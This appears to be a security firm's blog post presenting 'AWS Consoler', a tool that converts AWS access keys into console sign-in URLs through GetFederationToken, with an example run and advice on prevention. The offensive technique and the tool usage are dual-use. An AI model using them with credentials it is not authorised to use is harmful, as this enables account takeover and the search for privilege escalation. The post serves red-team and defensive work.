AWS has written a handful of blogs (1, 2) on the topic, and has a short instruction guide on its use. The long and the short is that it allows for the conversion of certain types of temporary credentials to console federation tokens. These tokens can be included in to a URL which grants access to the AWS console. All that’s needed is a set of calls to the federation endpoint, and you’re given a magic token that allows direct access to the AWS console.

There’s a couple of caveats, though – you need temporary credentials. The most common mechanism to obtain these credentials is with a call to the AssumeRole method in the STS service – as the name suggests, this allows a caller to gain access to an IAM role with an appropriate role trust policy.

However, sts:AssumeRole is generally regarded as a “dangerous” permission, in that it can be used to significantly elevate privilege – for that reason, it’s a permission we recommend clients avoid granting unless necessary. Regardless, we’d also need to know of a role we can assume, which may or may not be available. There are other common ways to obtain credentials – the most common being sts:GetSessionToken, which is often used to grant temporary credentials for a user based on a multi-factor authentication mechanism – however, credentials issued from this endpoint do not work with the federation endpoint, and will return an error when attempting to use them.

Chrome
D’oh! Foiled again. GetSessionToken credentials won’t work here, it looks like.

Permanently Temporary

Lucky for us, there’s another available option. While generally designed for IDP authentication from outside an AWS account, sts:GetFederationToken fits our needs quite nicely. This appears to be an older function of the AWS APIs, before newer authentication features were available (such as AWS SSO, AWS Cognito, and Web Identity/SAML federation). The permission is designed to be authenticated via a set of permanent IAM credentials (i.e. an on-premises application server) and federate a non-IAM user into AWS by providing temporary access credentials. The method allows for specifying the permissions of the new user via one or more policies – permissions are taken as the intersection of the calling IAM user and the policies supplied in the sts:GetFederationToken call.

In our case, we’re not concerned about reducing our access, so we can supply the built-in AWS-managed AdministratorAccess policy for the fullest set of effective permissions. To make our lives easier, this API method is considered non-dangerous, and is included in the AWS-managed ReadOnlyAccess policy. This is in-line with our own uses here – we’re not escalating access, just making it easier to use. Still, console access can be used to hunt for further privilege escalation opportunities.

With these temporary credentials in hand, we can call the federation service for our magic console sign-in link. In the response, we get a URL for obtaining access to the AWS console. No more copy/pasting from a window!

The right tool for the right job – AWS Consoler

To make the instrumentation process a bit easier, I’ve developed a tool for gaining access to the AWS console, which I’ve named “AWS Consoler” (creative, I know…). Check the tool out (and full usage instructions) in the GitHub repo. As with all of our open-source tools, we welcome pull requests!

This tool has a variety of features, and deep integrations with AWS’s SDK for Python (boto3). Credentials can be passed on the command line, as one might expect. However, because we’re powering this with boto3, they can also be taken from AWS CLI named profiles, via boto3’s built-in logic for environment variables, or even the IAM Metadata Service (when running on AWS compute resources) – boto3 does all the heavy lifting for us. Pass in your credentials, and you’ll get a sign-in link for the AWS console in the region of your choice. If you hate copy/pasting as much as I do, it can also open that link in your system’s default browser.

Here’s some example usage we would expect would work for most folks.

 
$> aws_consoler -v -a AKIA[REDACTED] -s [REDACTED]
2020-03-13 19:44:57,800 [aws_consoler.cli] INFO: Validating arguments...
2020-03-13 19:44:57,801 [aws_consoler.cli] INFO: Calling logic.
2020-03-13 19:44:57,820 [aws_consoler.logic] INFO: Boto3 session established.
2020-03-13 19:44:58,193 [aws_consoler.logic] WARNING: Creds still permanent, creating federated session.
2020-03-13 19:44:58,698 [aws_consoler.logic] INFO: New federated session established.
2020-03-13 19:44:59,153 [aws_consoler.logic] INFO: Session valid, attempting to federate as arn:aws:sts::123456789012:federated-user/aws_consoler.
2020-03-13 19:44:59,668 [aws_consoler.logic] INFO: URL generated!
https://signin.aws.amazon.com/federation?Action=login&Issuer=consoler.local&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2Fconsole%2Fhome%3Fregion%3Dus-east-1&SigninToken=[REDACTED]
 

Prevention

If you’re a developer or engineer working on an AWS environment, you might be wondering “how do I prevent this?” Fortunately, this type of access is relatively-easy to prevent, and falls in to our methodology for securing cloud environments:

Scope down permissions to the lowest-possible set

When setting up IAM permissions for a user, role, or other IAM principal, only grant the permissions which are absolutely necessary for normal operation. Additional permissions like sts:GetFederationToken, sts:AssumeRole, and other STS operations pose a risk towards privilege escalation, and can be dangerous if applied incorrectly.

If you’re using a policy managed by AWS, we’d recommend verifying the policy in-use doesn’t include permissions that are not needed for normal operation. Replacing AWS-managed policies with customer-managed policies is one of our suggestions for scenarios where the AWS-managed policy doesn’t exactly match the specific requirements for a IAM user or role’s purpose.

Chrome
This is a really great example of what not to do.

Don’t hard-code credentials in your environment

The initial entry point for this escalation requires obtaining AWS credentials. Often times, we’ll find these hard-coded into an environment in some fashion. We’d recommend transitioning to using things like execution roles for your compute resources in AWS. Implementations vary per compute resource – for example, EC2 has instance profiles, ECS has task roles, and Lambda has execution roles. By doing so, AWS SDKs can automatically obtain short-lived credentials for authenticating to AWS services.

Restrict access to the EC2 Instance Metadata Service

The EC2 Instance Metadata Service is a web service running in all EC2 environments at a pre-defined IP address. Normally, this service is used by compute resources to gain information about the environment which they were deployed to. This information usually include things like the following:

  • VPC configuration
  • EC2 userdata
  • Tags associated with the EC2 instance
  • Temporary IAM credentials for execution roles

Ensure you’ve restricted access to this service from resources in your application environment, especially if processing user data on said resources. In general, you’d restrict this using iptables rules, Windows Firewall rules or other routing rules on your compute resources. In addition, you can restrict this can be set at instance launch time.

Chrome
New features in EC2 allow for completely disabling the IAM Metadata Service if it’s not being used for anything.

Note that, if using ECS, an additional metadata endpoint exists for task-specific metadata – the ECS Task Metadata Service. Make sure you restrict access to this as well.

Set condition keys on IAM policies for execution roles

When using execution roles with your compute resources, consider restricting the policy to be only usable by that specific resource. This can be accomplished by a number of condition keys within the IAM policy, including ones restricting the VPC and/or IP address of the caller.

Conclusion

With this blog, and AWS Consoler, we hope to make the lives of red-teamers, blue-teamers, bug bounty searchers, and other individuals in the security sphere easier. Feel free to let us know how you’re using AWS Consoler via the comments below, or on your favorite social networks. You can find me on both LinkedIn and Twitter.

Discover how the NetSPI BAS solution helps organizations validate the efficacy of existing security controls and understand their Security Posture and Readiness.

X